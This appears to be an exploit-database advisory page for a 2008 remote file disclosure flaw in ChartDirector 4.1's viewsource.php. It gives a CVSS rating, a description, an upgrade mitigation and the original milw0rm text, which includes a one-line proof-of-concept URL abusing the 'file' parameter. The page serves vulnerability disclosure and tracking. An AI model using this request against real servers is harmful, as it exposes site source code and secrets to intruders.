header-logo
Suggest Exploit
vendor:
ChartDirector
by:
Stack-Terrorist
8.8
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: ChartDirector
Affected Version From: 4.1
Affected Version To: 4.1
Patch Exists: YES
Related CWE: N/A
CPE: chartdirector
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ChartDirector Ver 4.1 (viewsource.php) Remote File Disclosure Vulnerability

A vulnerability exists in ChartDirector Ver 4.1, which allows a remote attacker to disclose sensitive information. This is due to a failure in the application to properly sanitize user-supplied input to the 'file' parameter of the 'viewsource.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing a specially crafted 'file' parameter to the vulnerable script. This will disclose the source code of the specified file.

Mitigation:

Upgrade to the latest version of ChartDirector Ver 4.1 or later.
Source

Exploit-DB raw data:

##############################################################################
# ChartDirector Ver 4.1 (viewsource.php) Remote File Disclosure Vulnerability
#
#  D Script : http://www.advsofteng.com/download.html
#
#
#  By : Stack-Terrorist [v40]
#  
#  POC :  http://site.com/chartdirector/phpdemo/viewsource.php?file=viewsource.php
#
#
##############################################################################
#  Greetz : Tryag-Team -JIKI Team GoLd_M [Mahmod_Ali] -H-T Team -RoMaNcYxHaCkEr -Str0ke
##############################################################################

# milw0rm.com [2008-04-07]

Navigation

Suggest Exploit

Services By CQR